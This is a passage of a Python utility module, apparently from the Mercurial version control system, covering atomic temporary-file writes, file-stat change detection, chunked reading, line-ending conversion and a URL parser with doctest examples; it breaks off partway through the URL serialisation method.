1928 1929 fd, temp = tempfile.mkstemp(prefix='.%s-' % fn, suffix='~', dir=d)
1929 1930 os.close(fd)
1930 1931 # Temporary files are created with mode 0600, which is usually not
1931 1932 # what we want. If the original file already exists, just copy
1932 1933 # its mode. Otherwise, manually obey umask.
1933 1934 copymode(name, temp, createmode)
1934 1935 if emptyok:
1935 1936 return temp
1936 1937 try:
1937 1938 try:
1938 1939 ifp = posixfile(name, "rb")
1939 1940 except IOError as inst:
1940 1941 if inst.errno == errno.ENOENT:
1941 1942 return temp
1942 1943 if not getattr(inst, 'filename', None):
1943 1944 inst.filename = name
1944 1945 raise
1945 1946 ofp = posixfile(temp, "wb")
1946 1947 for chunk in filechunkiter(ifp):
1947 1948 ofp.write(chunk)
1948 1949 ifp.close()
1949 1950 ofp.close()
1950 1951 except: # re-raises
1951 1952 try:
1952 1953 os.unlink(temp)
1953 1954 except OSError:
1954 1955 pass
1955 1956 raise
1956 1957 return temp
1957 1958
1958 1959 class filestat(object):
1959 1960 """help to exactly detect change of a file
1960 1961
1961 1962 'stat' attribute is result of 'os.stat()' if specified 'path'
1962 1963 exists. Otherwise, it is None. This can avoid preparative
1963 1964 'exists()' examination on client side of this class.
1964 1965 """
1965 1966 def __init__(self, stat):
1966 1967 self.stat = stat
1967 1968
1968 1969 @classmethod
1969 1970 def frompath(cls, path):
1970 1971 try:
1971 1972 stat = os.stat(path)
1972 1973 except OSError as err:
1973 1974 if err.errno != errno.ENOENT:
1974 1975 raise
1975 1976 stat = None
1976 1977 return cls(stat)
1977 1978
1978 1979 @classmethod
1979 1980 def fromfp(cls, fp):
1980 1981 stat = os.fstat(fp.fileno())
1981 1982 return cls(stat)
1982 1983
1983 1984 __hash__ = object.__hash__
1984 1985
1985 1986 def __eq__(self, old):
1986 1987 try:
1987 1988 # if ambiguity between stat of new and old file is
1988 1989 # avoided, comparison of size, ctime and mtime is enough
1989 1990 # to exactly detect change of a file regardless of platform
1990 1991 return (self.stat.st_size == old.stat.st_size and
1991 1992 self.stat[stat.ST_CTIME] == old.stat[stat.ST_CTIME] and
1992 1993 self.stat[stat.ST_MTIME] == old.stat[stat.ST_MTIME])
1993 1994 except AttributeError:
1994 1995 pass
1995 1996 try:
1996 1997 return self.stat is None and old.stat is None
1997 1998 except AttributeError:
1998 1999 return False
1999 2000
2000 2001 def isambig(self, old):
2001 2002 """Examine whether new (= self) stat is ambiguous against old one
2002 2003
2003 2004 "S[N]" below means stat of a file at N-th change:
2004 2005
2005 2006 - S[n-1].ctime < S[n].ctime: can detect change of a file
2006 2007 - S[n-1].ctime == S[n].ctime
2007 2008 - S[n-1].ctime < S[n].mtime: means natural advancing (*1)
2008 2009 - S[n-1].ctime == S[n].mtime: is ambiguous (*2)
2009 2010 - S[n-1].ctime > S[n].mtime: never occurs naturally (don't care)
2010 2011 - S[n-1].ctime > S[n].ctime: never occurs naturally (don't care)
2011 2012
2012 2013 Case (*2) above means that a file was changed twice or more at
2013 2014 same time in sec (= S[n-1].ctime), and comparison of timestamp
2014 2015 is ambiguous.
2015 2016
2016 2017 Base idea to avoid such ambiguity is "advance mtime 1 sec, if
2017 2018 timestamp is ambiguous".
2018 2019
2019 2020 But advancing mtime only in case (*2) doesn't work as
2020 2021 expected, because naturally advanced S[n].mtime in case (*1)
2021 2022 might be equal to manually advanced S[n-1 or earlier].mtime.
2022 2023
2023 2024 Therefore, all "S[n-1].ctime == S[n].ctime" cases should be
2024 2025 treated as ambiguous regardless of mtime, to avoid overlooking
2025 2026 by confliction between such mtime.
2026 2027
2027 2028 Advancing mtime "if isambig(oldstat)" ensures "S[n-1].mtime !=
2028 2029 S[n].mtime", even if size of a file isn't changed.
2029 2030 """
2030 2031 try:
2031 2032 return (self.stat[stat.ST_CTIME] == old.stat[stat.ST_CTIME])
2032 2033 except AttributeError:
2033 2034 return False
2034 2035
2035 2036 def avoidambig(self, path, old):
2036 2037 """Change file stat of specified path to avoid ambiguity
2037 2038
2038 2039 'old' should be previous filestat of 'path'.
2039 2040
2040 2041 This skips avoiding ambiguity, if a process doesn't have
2041 2042 appropriate privileges for 'path'. This returns False in this
2042 2043 case.
2043 2044
2044 2045 Otherwise, this returns True, as "ambiguity is avoided".
2045 2046 """
2046 2047 advanced = (old.stat[stat.ST_MTIME] + 1) & 0x7fffffff
2047 2048 try:
2048 2049 os.utime(path, (advanced, advanced))
2049 2050 except OSError as inst:
2050 2051 if inst.errno == errno.EPERM:
2051 2052 # utime() on the file created by another user causes EPERM,
2052 2053 # if a process doesn't have appropriate privileges
2053 2054 return False
2054 2055 raise
2055 2056 return True
2056 2057
2057 2058 def __ne__(self, other):
2058 2059 return not self == other
2059 2060
2060 2061 class atomictempfile(object):
2061 2062 '''writable file object that atomically updates a file
2062 2063
2063 2064 All writes will go to a temporary copy of the original file. Call
2064 2065 close() when you are done writing, and atomictempfile will rename
2065 2066 the temporary copy to the original name, making the changes
2066 2067 visible. If the object is destroyed without being closed, all your
2067 2068 writes are discarded.
2068 2069
2069 2070 checkambig argument of constructor is used with filestat, and is
2070 2071 useful only if target file is guarded by any lock (e.g. repo.lock
2071 2072 or repo.wlock).
2072 2073 '''
2073 2074 def __init__(self, name, mode='w+b', createmode=None, checkambig=False):
2074 2075 self.__name = name # permanent name
2075 2076 self._tempname = mktempcopy(name, emptyok=('w' in mode),
2076 2077 createmode=createmode)
2077 2078 self._fp = posixfile(self._tempname, mode)
2078 2079 self._checkambig = checkambig
2079 2080
2080 2081 # delegated methods
2081 2082 self.read = self._fp.read
2082 2083 self.write = self._fp.write
2083 2084 self.seek = self._fp.seek
2084 2085 self.tell = self._fp.tell
2085 2086 self.fileno = self._fp.fileno
2086 2087
2087 2088 def close(self):
2088 2089 if not self._fp.closed:
2089 2090 self._fp.close()
2090 2091 filename = localpath(self.__name)
2091 2092 oldstat = self._checkambig and filestat.frompath(filename)
2092 2093 if oldstat and oldstat.stat:
2093 2094 rename(self._tempname, filename)
2094 2095 newstat = filestat.frompath(filename)
2095 2096 if newstat.isambig(oldstat):
2096 2097 # stat of changed file is ambiguous to original one
2097 2098 advanced = (oldstat.stat[stat.ST_MTIME] + 1) & 0x7fffffff
2098 2099 os.utime(filename, (advanced, advanced))
2099 2100 else:
2100 2101 rename(self._tempname, filename)
2101 2102
2102 2103 def discard(self):
2103 2104 if not self._fp.closed:
2104 2105 try:
2105 2106 os.unlink(self._tempname)
2106 2107 except OSError:
2107 2108 pass
2108 2109 self._fp.close()
2109 2110
2110 2111 def __del__(self):
2111 2112 if safehasattr(self, '_fp'): # constructor actually did something
2112 2113 self.discard()
2113 2114
2114 2115 def __enter__(self):
2115 2116 return self
2116 2117
2117 2118 def __exit__(self, exctype, excvalue, traceback):
2118 2119 if exctype is not None:
2119 2120 self.discard()
2120 2121 else:
2121 2122 self.close()
2122 2123
2123 2124 def unlinkpath(f, ignoremissing=False):
2124 2125 """unlink and remove the directory if it is empty"""
2125 2126 if ignoremissing:
2126 2127 tryunlink(f)
2127 2128 else:
2128 2129 unlink(f)
2129 2130 # try removing directories that might now be empty
2130 2131 try:
2131 2132 removedirs(os.path.dirname(f))
2132 2133 except OSError:
2133 2134 pass
2134 2135
2135 2136 def tryunlink(f):
2136 2137 """Attempt to remove a file, ignoring ENOENT errors."""
2137 2138 try:
2138 2139 unlink(f)
2139 2140 except OSError as e:
2140 2141 if e.errno != errno.ENOENT:
2141 2142 raise
2142 2143
2143 2144 def makedirs(name, mode=None, notindexed=False):
2144 2145 """recursive directory creation with parent mode inheritance
2145 2146
2146 2147 Newly created directories are marked as "not to be indexed by
2147 2148 the content indexing service", if ``notindexed`` is specified
2148 2149 for "write" mode access.
2149 2150 """
2150 2151 try:
2151 2152 makedir(name, notindexed)
2152 2153 except OSError as err:
2153 2154 if err.errno == errno.EEXIST:
2154 2155 return
2155 2156 if err.errno != errno.ENOENT or not name:
2156 2157 raise
2157 2158 parent = os.path.dirname(os.path.abspath(name))
2158 2159 if parent == name:
2159 2160 raise
2160 2161 makedirs(parent, mode, notindexed)
2161 2162 try:
2162 2163 makedir(name, notindexed)
2163 2164 except OSError as err:
2164 2165 # Catch EEXIST to handle races
2165 2166 if err.errno == errno.EEXIST:
2166 2167 return
2167 2168 raise
2168 2169 if mode is not None:
2169 2170 os.chmod(name, mode)
2170 2171
2171 2172 def readfile(path):
2172 2173 with open(path, 'rb') as fp:
2173 2174 return fp.read()
2174 2175
2175 2176 def writefile(path, text):
2176 2177 with open(path, 'wb') as fp:
2177 2178 fp.write(text)
2178 2179
2179 2180 def appendfile(path, text):
2180 2181 with open(path, 'ab') as fp:
2181 2182 fp.write(text)
2182 2183
2183 2184 class chunkbuffer(object):
2184 2185 """Allow arbitrary sized chunks of data to be efficiently read from an
2185 2186 iterator over chunks of arbitrary size."""
2186 2187
2187 2188 def __init__(self, in_iter):
2188 2189 """in_iter is the iterator that's iterating over the input chunks."""
2189 2190 def splitbig(chunks):
2190 2191 for chunk in chunks:
2191 2192 if len(chunk) > 2**20:
2192 2193 pos = 0
2193 2194 while pos < len(chunk):
2194 2195 end = pos + 2 ** 18
2195 2196 yield chunk[pos:end]
2196 2197 pos = end
2197 2198 else:
2198 2199 yield chunk
2199 2200 self.iter = splitbig(in_iter)
2200 2201 self._queue = collections.deque()
2201 2202 self._chunkoffset = 0
2202 2203
2203 2204 def read(self, l=None):
2204 2205 """Read L bytes of data from the iterator of chunks of data.
2205 2206 Returns less than L bytes if the iterator runs dry.
2206 2207
2207 2208 If size parameter is omitted, read everything"""
2208 2209 if l is None:
2209 2210 return ''.join(self.iter)
2210 2211
2211 2212 left = l
2212 2213 buf = []
2213 2214 queue = self._queue
2214 2215 while left > 0:
2215 2216 # refill the queue
2216 2217 if not queue:
2217 2218 target = 2**18
2218 2219 for chunk in self.iter:
2219 2220 queue.append(chunk)
2220 2221 target -= len(chunk)
2221 2222 if target <= 0:
2222 2223 break
2223 2224 if not queue:
2224 2225 break
2225 2226
2226 2227 # The easy way to do this would be to queue.popleft(), modify the
2227 2228 # chunk (if necessary), then queue.appendleft(). However, for cases
2228 2229 # where we read partial chunk content, this incurs 2 dequeue
2229 2230 # mutations and creates a new str for the remaining chunk in the
2230 2231 # queue. Our code below avoids this overhead.
2231 2232
2232 2233 chunk = queue[0]
2233 2234 chunkl = len(chunk)
2234 2235 offset = self._chunkoffset
2235 2236
2236 2237 # Use full chunk.
2237 2238 if offset == 0 and left >= chunkl:
2238 2239 left -= chunkl
2239 2240 queue.popleft()
2240 2241 buf.append(chunk)
2241 2242 # self._chunkoffset remains at 0.
2242 2243 continue
2243 2244
2244 2245 chunkremaining = chunkl - offset
2245 2246
2246 2247 # Use all of unconsumed part of chunk.
2247 2248 if left >= chunkremaining:
2248 2249 left -= chunkremaining
2249 2250 queue.popleft()
2250 2251 # offset == 0 is enabled by block above, so this won't merely
2251 2252 # copy via ``chunk[0:]``.
2252 2253 buf.append(chunk[offset:])
2253 2254 self._chunkoffset = 0
2254 2255
2255 2256 # Partial chunk needed.
2256 2257 else:
2257 2258 buf.append(chunk[offset:offset + left])
2258 2259 self._chunkoffset += left
2259 2260 left -= chunkremaining
2260 2261
2261 2262 return ''.join(buf)
2262 2263
2263 2264 def filechunkiter(f, size=131072, limit=None):
2264 2265 """Create a generator that produces the data in the file size
2265 2266 (default 131072) bytes at a time, up to optional limit (default is
2266 2267 to read all data). Chunks may be less than size bytes if the
2267 2268 chunk is the last chunk in the file, or the file is a socket or
2268 2269 some other type of file that sometimes reads less data than is
2269 2270 requested."""
2270 2271 assert size >= 0
2271 2272 assert limit is None or limit >= 0
2272 2273 while True:
2273 2274 if limit is None:
2274 2275 nbytes = size
2275 2276 else:
2276 2277 nbytes = min(limit, size)
2277 2278 s = nbytes and f.read(nbytes)
2278 2279 if not s:
2279 2280 break
2280 2281 if limit:
2281 2282 limit -= len(s)
2282 2283 yield s
2283 2284
2284 2285 class cappedreader(object):
2285 2286 """A file object proxy that allows reading up to N bytes.
2286 2287
2287 2288 Given a source file object, instances of this type allow reading up to
2288 2289 N bytes from that source file object. Attempts to read past the allowed
2289 2290 limit are treated as EOF.
2290 2291
2291 2292 It is assumed that I/O is not performed on the original file object
2292 2293 in addition to I/O that is performed by this instance. If there is,
2293 2294 state tracking will get out of sync and unexpected results will ensue.
2294 2295 """
2295 2296 def __init__(self, fh, limit):
2296 2297 """Allow reading up to <limit> bytes from <fh>."""
2297 2298 self._fh = fh
2298 2299 self._left = limit
2299 2300
2300 2301 def read(self, n=-1):
2301 2302 if not self._left:
2302 2303 return b''
2303 2304
2304 2305 if n < 0:
2305 2306 n = self._left
2306 2307
2307 2308 data = self._fh.read(min(n, self._left))
2308 2309 self._left -= len(data)
2309 2310 assert self._left >= 0
2310 2311
2311 2312 return data
2312 2313
2313 2314 def readinto(self, b):
2314 2315 res = self.read(len(b))
2315 2316 if res is None:
2316 2317 return None
2317 2318
2318 2319 b[0:len(res)] = res
2319 2320 return len(res)
2320 2321
2321 2322 def unitcountfn(*unittable):
2322 2323 '''return a function that renders a readable count of some quantity'''
2323 2324
2324 2325 def go(count):
2325 2326 for multiplier, divisor, format in unittable:
2326 2327 if abs(count) >= divisor * multiplier:
2327 2328 return format % (count / float(divisor))
2328 2329 return unittable[-1][2] % count
2329 2330
2330 2331 return go
2331 2332
2332 2333 def processlinerange(fromline, toline):
2333 2334 """Check that linerange <fromline>:<toline> makes sense and return a
2334 2335 0-based range.
2335 2336
2336 2337 >>> processlinerange(10, 20)
2337 2338 (9, 20)
2338 2339 >>> processlinerange(2, 1)
2339 2340 Traceback (most recent call last):
2340 2341 ...
2341 2342 ParseError: line range must be positive
2342 2343 >>> processlinerange(0, 5)
2343 2344 Traceback (most recent call last):
2344 2345 ...
2345 2346 ParseError: fromline must be strictly positive
2346 2347 """
2347 2348 if toline - fromline < 0:
2348 2349 raise error.ParseError(_("line range must be positive"))
2349 2350 if fromline < 1:
2350 2351 raise error.ParseError(_("fromline must be strictly positive"))
2351 2352 return fromline - 1, toline
2352 2353
2353 2354 bytecount = unitcountfn(
2354 2355 (100, 1 << 30, _('%.0f GB')),
2355 2356 (10, 1 << 30, _('%.1f GB')),
2356 2357 (1, 1 << 30, _('%.2f GB')),
2357 2358 (100, 1 << 20, _('%.0f MB')),
2358 2359 (10, 1 << 20, _('%.1f MB')),
2359 2360 (1, 1 << 20, _('%.2f MB')),
2360 2361 (100, 1 << 10, _('%.0f KB')),
2361 2362 (10, 1 << 10, _('%.1f KB')),
2362 2363 (1, 1 << 10, _('%.2f KB')),
2363 2364 (1, 1, _('%.0f bytes')),
2364 2365 )
2365 2366
2366 2367 class transformingwriter(object):
2367 2368 """Writable file wrapper to transform data by function"""
2368 2369
2369 2370 def __init__(self, fp, encode):
2370 2371 self._fp = fp
2371 2372 self._encode = encode
2372 2373
2373 2374 def close(self):
2374 2375 self._fp.close()
2375 2376
2376 2377 def flush(self):
2377 2378 self._fp.flush()
2378 2379
2379 2380 def write(self, data):
2380 2381 return self._fp.write(self._encode(data))
2381 2382
2382 2383 # Matches a single EOL which can either be a CRLF where repeated CR
2383 2384 # are removed or a LF. We do not care about old Macintosh files, so a
2384 2385 # stray CR is an error.
2385 2386 _eolre = remod.compile(br'\r*\n')
2386 2387
2387 2388 def tolf(s):
2388 2389 return _eolre.sub('\n', s)
2389 2390
2390 2391 def tocrlf(s):
2391 2392 return _eolre.sub('\r\n', s)
2392 2393
2393 2394 def _crlfwriter(fp):
2394 2395 return transformingwriter(fp, tocrlf)
2395 2396
2396 2397 if pycompat.oslinesep == '\r\n':
2397 2398 tonativeeol = tocrlf
2398 2399 fromnativeeol = tolf
2399 2400 nativeeolwriter = _crlfwriter
2400 2401 else:
2401 2402 tonativeeol = pycompat.identity
2402 2403 fromnativeeol = pycompat.identity
2403 2404 nativeeolwriter = pycompat.identity
2404 2405
2405 2406 if (pyplatform.python_implementation() == 'CPython' and
2406 2407 sys.version_info < (3, 0)):
2407 2408 # There is an issue in CPython that some IO methods do not handle EINTR
2408 2409 # correctly. The following table shows what CPython version (and functions)
2409 2410 # are affected (buggy: has the EINTR bug, okay: otherwise):
2410 2411 #
2411 2412 # | < 2.7.4 | 2.7.4 to 2.7.12 | >= 3.0
2412 2413 # --------------------------------------------------
2413 2414 # fp.__iter__ | buggy | buggy | okay
2414 2415 # fp.read* | buggy | okay [1] | okay
2415 2416 #
2416 2417 # [1]: fixed by changeset 67dc99a989cd in the cpython hg repo.
2417 2418 #
2418 2419 # Here we workaround the EINTR issue for fileobj.__iter__. Other methods
2419 2420 # like "read*" are ignored for now, as Python < 2.7.4 is a minority.
2420 2421 #
2421 2422 # Although we can workaround the EINTR issue for fp.__iter__, it is slower:
2422 2423 # "for x in fp" is 4x faster than "for x in iter(fp.readline, '')" in
2423 2424 # CPython 2, because CPython 2 maintains an internal readahead buffer for
2424 2425 # fp.__iter__ but not other fp.read* methods.
2425 2426 #
2426 2427 # On modern systems like Linux, the "read" syscall cannot be interrupted
2427 2428 # when reading "fast" files like on-disk files. So the EINTR issue only
2428 2429 # affects things like pipes, sockets, ttys etc. We treat "normal" (S_ISREG)
2429 2430 # files approximately as "fast" files and use the fast (unsafe) code path,
2430 2431 # to minimize the performance impact.
2431 2432 if sys.version_info >= (2, 7, 4):
2432 2433 # fp.readline deals with EINTR correctly, use it as a workaround.
2433 2434 def _safeiterfile(fp):
2434 2435 return iter(fp.readline, '')
2435 2436 else:
2436 2437 # fp.read* are broken too, manually deal with EINTR in a stupid way.
2437 2438 # note: this may block longer than necessary because of bufsize.
2438 2439 def _safeiterfile(fp, bufsize=4096):
2439 2440 fd = fp.fileno()
2440 2441 line = ''
2441 2442 while True:
2442 2443 try:
2443 2444 buf = os.read(fd, bufsize)
2444 2445 except OSError as ex:
2445 2446 # os.read only raises EINTR before any data is read
2446 2447 if ex.errno == errno.EINTR:
2447 2448 continue
2448 2449 else:
2449 2450 raise
2450 2451 line += buf
2451 2452 if '\n' in buf:
2452 2453 splitted = line.splitlines(True)
2453 2454 line = ''
2454 2455 for l in splitted:
2455 2456 if l[-1] == '\n':
2456 2457 yield l
2457 2458 else:
2458 2459 line = l
2459 2460 if not buf:
2460 2461 break
2461 2462 if line:
2462 2463 yield line
2463 2464
2464 2465 def iterfile(fp):
2465 2466 fastpath = True
2466 2467 if type(fp) is file:
2467 2468 fastpath = stat.S_ISREG(os.fstat(fp.fileno()).st_mode)
2468 2469 if fastpath:
2469 2470 return fp
2470 2471 else:
2471 2472 return _safeiterfile(fp)
2472 2473 else:
2473 2474 # PyPy and CPython 3 do not have the EINTR issue thus no workaround needed.
2474 2475 def iterfile(fp):
2475 2476 return fp
2476 2477
2477 2478 def iterlines(iterator):
2478 2479 for chunk in iterator:
2479 2480 for line in chunk.splitlines():
2480 2481 yield line
2481 2482
2482 2483 def expandpath(path):
2483 2484 return os.path.expanduser(os.path.expandvars(path))
2484 2485
2485 2486 def interpolate(prefix, mapping, s, fn=None, escape_prefix=False):
2486 2487 """Return the result of interpolating items in the mapping into string s.
2487 2488
2488 2489 prefix is a single character string, or a two character string with
2489 2490 a backslash as the first character if the prefix needs to be escaped in
2490 2491 a regular expression.
2491 2492
2492 2493 fn is an optional function that will be applied to the replacement text
2493 2494 just before replacement.
2494 2495
2495 2496 escape_prefix is an optional flag that allows using doubled prefix for
2496 2497 its escaping.
2497 2498 """
2498 2499 fn = fn or (lambda s: s)
2499 2500 patterns = '|'.join(mapping.keys())
2500 2501 if escape_prefix:
2501 2502 patterns += '|' + prefix
2502 2503 if len(prefix) > 1:
2503 2504 prefix_char = prefix[1:]
2504 2505 else:
2505 2506 prefix_char = prefix
2506 2507 mapping[prefix_char] = prefix_char
2507 2508 r = remod.compile(br'%s(%s)' % (prefix, patterns))
2508 2509 return r.sub(lambda x: fn(mapping[x.group()[1:]]), s)
2509 2510
2510 2511 def getport(port):
2511 2512 """Return the port for a given network service.
2512 2513
2513 2514 If port is an integer, it's returned as is. If it's a string, it's
2514 2515 looked up using socket.getservbyname(). If there's no matching
2515 2516 service, error.Abort is raised.
2516 2517 """
2517 2518 try:
2518 2519 return int(port)
2519 2520 except ValueError:
2520 2521 pass
2521 2522
2522 2523 try:
2523 2524 return socket.getservbyname(pycompat.sysstr(port))
2524 2525 except socket.error:
2525 2526 raise error.Abort(_("no port number associated with service '%s'")
2526 2527 % port)
2527 2528
2528 2529 class url(object):
2529 2530 r"""Reliable URL parser.
2530 2531
2531 2532 This parses URLs and provides attributes for the following
2532 2533 components:
2533 2534
2534 2535 <scheme>://<user>:<passwd>@<host>:<port>/<path>?<query>#<fragment>
2535 2536
2536 2537 Missing components are set to None. The only exception is
2537 2538 fragment, which is set to '' if present but empty.
2538 2539
2539 2540 If parsefragment is False, fragment is included in query. If
2540 2541 parsequery is False, query is included in path. If both are
2541 2542 False, both fragment and query are included in path.
2542 2543
2543 2544 See http://www.ietf.org/rfc/rfc2396.txt for more information.
2544 2545
2545 2546 Note that for backward compatibility reasons, bundle URLs do not
2546 2547 take host names. That means 'bundle://../' has a path of '../'.
2547 2548
2548 2549 Examples:
2549 2550
2550 2551 >>> url(b'http://www.ietf.org/rfc/rfc2396.txt')
2551 2552 <url scheme: 'http', host: 'www.ietf.org', path: 'rfc/rfc2396.txt'>
2552 2553 >>> url(b'ssh://[::1]:2200//home/joe/repo')
2553 2554 <url scheme: 'ssh', host: '[::1]', port: '2200', path: '/home/joe/repo'>
2554 2555 >>> url(b'file:///home/joe/repo')
2555 2556 <url scheme: 'file', path: '/home/joe/repo'>
2556 2557 >>> url(b'file:///c:/temp/foo/')
2557 2558 <url scheme: 'file', path: 'c:/temp/foo/'>
2558 2559 >>> url(b'bundle:foo')
2559 2560 <url scheme: 'bundle', path: 'foo'>
2560 2561 >>> url(b'bundle://../foo')
2561 2562 <url scheme: 'bundle', path: '../foo'>
2562 2563 >>> url(br'c:\foo\bar')
2563 2564 <url path: 'c:\\foo\\bar'>
2564 2565 >>> url(br'\\blah\blah\blah')
2565 2566 <url path: '\\\\blah\\blah\\blah'>
2566 2567 >>> url(br'\\blah\blah\blah#baz')
2567 2568 <url path: '\\\\blah\\blah\\blah', fragment: 'baz'>
2568 2569 >>> url(br'file:///C:\users\me')
2569 2570 <url scheme: 'file', path: 'C:\\users\\me'>
2570 2571
2571 2572 Authentication credentials:
2572 2573
2573 2574 >>> url(b'ssh://joe:xyz@x/repo')
2574 2575 <url scheme: 'ssh', user: 'joe', passwd: 'xyz', host: 'x', path: 'repo'>
2575 2576 >>> url(b'ssh://joe@x/repo')
2576 2577 <url scheme: 'ssh', user: 'joe', host: 'x', path: 'repo'>
2577 2578
2578 2579 Query strings and fragments:
2579 2580
2580 2581 >>> url(b'http://host/a?b#c')
2581 2582 <url scheme: 'http', host: 'host', path: 'a', query: 'b', fragment: 'c'>
2582 2583 >>> url(b'http://host/a?b#c', parsequery=False, parsefragment=False)
2583 2584 <url scheme: 'http', host: 'host', path: 'a?b#c'>
2584 2585
2585 2586 Empty path:
2586 2587
2587 2588 >>> url(b'')
2588 2589 <url path: ''>
2589 2590 >>> url(b'#a')
2590 2591 <url path: '', fragment: 'a'>
2591 2592 >>> url(b'http://host/')
2592 2593 <url scheme: 'http', host: 'host', path: ''>
2593 2594 >>> url(b'http://host/#a')
2594 2595 <url scheme: 'http', host: 'host', path: '', fragment: 'a'>
2595 2596
2596 2597 Only scheme:
2597 2598
2598 2599 >>> url(b'http:')
2599 2600 <url scheme: 'http'>
2600 2601 """
2601 2602
2602 2603 _safechars = "!~*'()+"
2603 2604 _safepchars = "/!~*'()+:\\"
2604 2605 _matchscheme = remod.compile('^[a-zA-Z0-9+.\\-]+:').match
2605 2606
2606 2607 def __init__(self, path, parsequery=True, parsefragment=True):
2607 2608 # We slowly chomp away at path until we have only the path left
2608 2609 self.scheme = self.user = self.passwd = self.host = None
2609 2610 self.port = self.path = self.query = self.fragment = None
2610 2611 self._localpath = True
2611 2612 self._hostport = ''
2612 2613 self._origpath = path
2613 2614
2614 2615 if parsefragment and '#' in path:
2615 2616 path, self.fragment = path.split('#', 1)
2616 2617
2617 2618 # special case for Windows drive letters and UNC paths
2618 2619 if hasdriveletter(path) or path.startswith('\\\\'):
2619 2620 self.path = path
2620 2621 return
2621 2622
2622 2623 # For compatibility reasons, we can't handle bundle paths as
2623 2624 # normal URLS
2624 2625 if path.startswith('bundle:'):
2625 2626 self.scheme = 'bundle'
2626 2627 path = path[7:]
2627 2628 if path.startswith('//'):
2628 2629 path = path[2:]
2629 2630 self.path = path
2630 2631 return
2631 2632
2632 2633 if self._matchscheme(path):
2633 2634 parts = path.split(':', 1)
2634 2635 if parts[0]:
2635 2636 self.scheme, path = parts
2636 2637 self._localpath = False
2637 2638
2638 2639 if not path:
2639 2640 path = None
2640 2641 if self._localpath:
2641 2642 self.path = ''
2642 2643 return
2643 2644 else:
2644 2645 if self._localpath:
2645 2646 self.path = path
2646 2647 return
2647 2648
2648 2649 if parsequery and '?' in path:
2649 2650 path, self.query = path.split('?', 1)
2650 2651 if not path:
2651 2652 path = None
2652 2653 if not self.query:
2653 2654 self.query = None
2654 2655
2655 2656 # // is required to specify a host/authority
2656 2657 if path and path.startswith('//'):
2657 2658 parts = path[2:].split('/', 1)
2658 2659 if len(parts) > 1:
2659 2660 self.host, path = parts
2660 2661 else:
2661 2662 self.host = parts[0]
2662 2663 path = None
2663 2664 if not self.host:
2664 2665 self.host = None
2665 2666 # path of file:///d is /d
2666 2667 # path of file:///d:/ is d:/, not /d:/
2667 2668 if path and not hasdriveletter(path):
2668 2669 path = '/' + path
2669 2670
2670 2671 if self.host and '@' in self.host:
2671 2672 self.user, self.host = self.host.rsplit('@', 1)
2672 2673 if ':' in self.user:
2673 2674 self.user, self.passwd = self.user.split(':', 1)
2674 2675 if not self.host:
2675 2676 self.host = None
2676 2677
2677 2678 # Don't split on colons in IPv6 addresses without ports
2678 2679 if (self.host and ':' in self.host and
2679 2680 not (self.host.startswith('[') and self.host.endswith(']'))):
2680 2681 self._hostport = self.host
2681 2682 self.host, self.port = self.host.rsplit(':', 1)
2682 2683 if not self.host:
2683 2684 self.host = None
2684 2685
2685 2686 if (self.host and self.scheme == 'file' and
2686 2687 self.host not in ('localhost', '127.0.0.1', '[::1]')):
2687 2688 raise error.Abort(_('file:// URLs can only refer to localhost'))
2688 2689
2689 2690 self.path = path
2690 2691
2691 2692 # leave the query string escaped
2692 2693 for a in ('user', 'passwd', 'host', 'port',
2693 2694 'path', 'fragment'):
2694 2695 v = getattr(self, a)
2695 2696 if v is not None:
2696 2697 setattr(self, a, urlreq.unquote(v))
2697 2698
2698 2699 @encoding.strmethod
2699 2700 def __repr__(self):
2700 2701 attrs = []
2701 2702 for a in ('scheme', 'user', 'passwd', 'host', 'port', 'path',
2702 2703 'query', 'fragment'):
2703 2704 v = getattr(self, a)
2704 2705 if v is not None:
2705 2706 attrs.append('%s: %r' % (a, v))
2706 2707 return '<url %s>' % ', '.join(attrs)
2707 2708
2708 2709 def __bytes__(self):
2709 2710 r"""Join the URL's components back into a URL string.
2710 2711
2711 2712 Examples:
2712 2713
2713 2714 >>> bytes(url(b'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'))
2714 2715 'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'
2715 2716 >>> bytes(url(b'http://user:pw@host:80/?foo=bar&baz=42'))
2716 2717 'http://user:pw@host:80/?foo=bar&baz=42'
2717 2718 >>> bytes(url(b'http://user:pw@host:80/?foo=bar%3dbaz'))
2718 2719 'http://user:pw@host:80/?foo=bar%3dbaz'
2719 2720 >>> bytes(url(b'ssh://user:pw@[::1]:2200//home/joe#'))
2720 2721 'ssh://user:pw@[::1]:2200//home/joe#'
2721 2722 >>> bytes(url(b'http://localhost:80//'))
2722 2723 'http://localhost:80//'
2723 2724 >>> bytes(url(b'http://localhost:80/'))
2724 2725 'http://localhost:80/'
2725 2726 >>> bytes(url(b'http://localhost:80'))
2726 2727 'http://localhost:80/'
2727 2728 >>> bytes(url(b'bundle:foo'))
2728 2729 'bundle:foo'
2729 2730 >>> bytes(url(b'bundle://../foo'))
2730 2731 'bundle:../foo'
2731 2732 >>> bytes(url(b'path'))
2732 2733 'path'
2733 2734 >>> bytes(url(b'file:///tmp/foo/bar'))
2734 2735 'file:///tmp/foo/bar'
2735 2736 >>> bytes(url(b'file:///c:/tmp/foo/bar'))
2736 2737 'file:///c:/tmp/foo/bar'
2737 2738 >>> print(url(br'bundle:foo\bar'))
2738 2739 bundle:foo\bar
2739 2740 >>> print(url(br'file:///D:\data\hg'))
2740 2741 file:///D:\data\hg
2741 2742 """
2742 2743 if self._localpath:
2743 2744 s = self.path
2744 2745 if self.scheme == 'bundle':
2745 2746 s = 'bundle:' + s
2746 2747 if self.fragment:
2747 2748 s += '#' + self.fragment
2748 2749 return s
2749 2750
2750 2751 s = self.scheme + ':'
2751 2752 if self.user or self.passwd or self.host:
2752 2753 s += '//'
2753 2754 elif self.scheme and (not self.path or self.path.startswith('/')
2754 2755 or hasdriveletter(self.path)):
2755 2756 s += '//'
2756 2757 if hasdriveletter(self.path):
2757 2758 s += '/'
2758 2759 if self.user:
2759 2760 s += urlreq.quote(self.user, safe=self._safechars)
2760 2761 if self.passwd:
2761 2762 s += ':' + urlreq.quote(self.passwd, safe=self._safechars)
2762 2763 if self.user or self.passwd:
2763 2764 s += '@'
2764 2765 if self.host:
2765 2766 if not (self.host.startswith('[') and self.host.endswith(']')):
2766 2767 s += urlreq.quote(self.host)
2767 2768 else:
2768 2769 s += self.host
2769 2770 if self.port:
2770 2771 s += ':' + urlreq.quote(self.port)
2771 2772 if self.host:
2772 2773 s += '/'
2773 2774 if self.path:
2774 2775 # TODO: similar to the query string, we should not unescape the
